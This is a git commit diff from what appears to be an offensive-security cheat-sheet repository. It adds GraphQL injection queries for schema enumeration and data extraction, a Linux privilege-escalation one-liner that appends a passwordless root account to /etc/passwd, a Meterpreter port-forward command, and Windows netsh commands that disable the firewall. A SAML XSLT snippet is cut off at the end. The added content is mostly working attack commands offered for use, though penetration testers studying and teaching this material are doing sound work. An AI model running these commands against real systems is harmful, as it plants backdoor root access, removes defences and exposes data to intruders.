GraphQL + LXD/etc/passwd PrivEsc + Win firewall

This commit is contained in:
Swissky 2019-06-09 13:46:40 +02:00
parent 00f50c5f32
commit 93f6c03b54
6 changed files with 33 additions and 8 deletions

Binary file not shown.

After

Width:  |  Height:  |  Size: 21 KiB

View File

@ -4,10 +4,10 @@
## Exploit ## Exploit
Identify an injection point ### Identify an injection point
```javascript ```js
?param={__schema{types{name}}} example.com/graphql?query={__schema{types{name}}}
``` ```
Check if errors are visible Check if errors are visible
@ -17,7 +17,15 @@ Check if errors are visible
?param={thisdefinitelydoesnotexist} ?param={thisdefinitelydoesnotexist}
``` ```
Enumerate Database Schema with the following GraphQL query ### Extract data
```js
example.com/graphql?query={TYPE_1{FIELD_1,FIELD_2}}
```
![HTB Help - GraphQL injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/GraphQL%20Injection/Images/htb-help.png?raw=true)
### Enumerate Database Schema with the following GraphQL query
```javascript ```javascript
fragment FullType on __Type { fragment FullType on __Type {
@ -114,10 +122,9 @@ query IntrospectionQuery {
} }
} }
} }
``` ```
Enumerate the definition of interesting types using the following GraphQL query, replacing "User" with the chosen type ### Enumerate the definition of interesting types using the following GraphQL query, replacing "User" with the chosen type
```javascript ```javascript
{__type (name: "User") {name fields{name type{name kind ofType{name kind}}}}} {__type (name: "User") {name fields{name type{name kind ofType{name kind}}}}}
@ -127,4 +134,4 @@ Enumerate the definition of interesting types using the following GraphQL query,
* [Introduction to GraphQL](https://graphql.org/learn/) * [Introduction to GraphQL](https://graphql.org/learn/)
* [GraphQL Introspection](https://graphql.org/learn/introspection/) * [GraphQL Introspection](https://graphql.org/learn/introspection/)
* [API Hacking GraphQL - @ghostlulz - jun 8, 2019](https://medium.com/@ghostlulzhacks/api-hacking-graphql-7b2866ba1cf2)

View File

@ -384,6 +384,14 @@ E.g: `hacker:$1$hacker$TzyKlv0/R/c28R.GAeLw.1:0:0:Hacker:/root:/bin/bash`
You can now use the `su` command with `hacker:hacker` You can now use the `su` command with `hacker:hacker`
Alternatively you can use the following lines to add a dummy user without a password.
WARNING: you might degrade the current security of the machine.
```powershell
echo 'dummy::0:0::/root:/bin/bash' >>/etc/passwd
su - dummy
```
## NFS Root Squashing ## NFS Root Squashing
@ -526,6 +534,8 @@ lxc start mycontainer
lxc exec mycontainer /bin/sh lxc exec mycontainer /bin/sh
``` ```
Alternatively https://github.com/initstring/lxd_root
## References ## References
- [SUID vs Capabilities - Dec 7, 2017 - Nick Void aka mn3m](https://mn3m.info/posts/suid-vs-capabilities/) - [SUID vs Capabilities - Dec 7, 2017 - Nick Void aka mn3m](https://mn3m.info/posts/suid-vs-capabilities/)

View File

@ -85,6 +85,7 @@ optional arguments:
```c ```c
portfwd list portfwd list
portfwd add -l 88 -p 88 -r 127.0.0.1
portfwd add -L 0.0.0.0 -l 445 -r 192.168.57.102 -p 445 portfwd add -L 0.0.0.0 -l 445 -r 192.168.57.102 -p 445
or or

View File

@ -172,6 +172,13 @@ List firewall's blocked ports
$f=New-object -comObject HNetCfg.FwPolicy2;$f.rules | where {$_.action -eq "0"} | select name,applicationname,localports $f=New-object -comObject HNetCfg.FwPolicy2;$f.rules | where {$_.action -eq "0"} | select name,applicationname,localports
``` ```
Disable firewall
```powershell
netsh firewall set opmode disable
netsh advfirewall set allprofiles state off
```
List all network shares List all network shares
```powershell ```powershell

View File

@ -161,7 +161,7 @@ The SAML response is accepted by the service provider. Due to the vulnerability,
An XSLT can be carried out by using the `transform` element. An XSLT can be carried out by using the `transform` element.
![http://sso-attacks.org/images/4/49/XSLT1.jpg](http://sso-attacks.org/images/4/49/XSLT1.jpg) ![http://sso-attacks.org/images/4/49/XSLT1.jpg](http://sso-attacks.org/images/4/49/XSLT1.jpg)
Picture from [http://sso-attacks.org/XSLT_Attack](http://sso-attacks.org/XSLT_Attack) Picture from [http://sso-attacks.org/XSLT_Attack](http://sso-attacks.org/XSLT_Attack)
```xml ```xml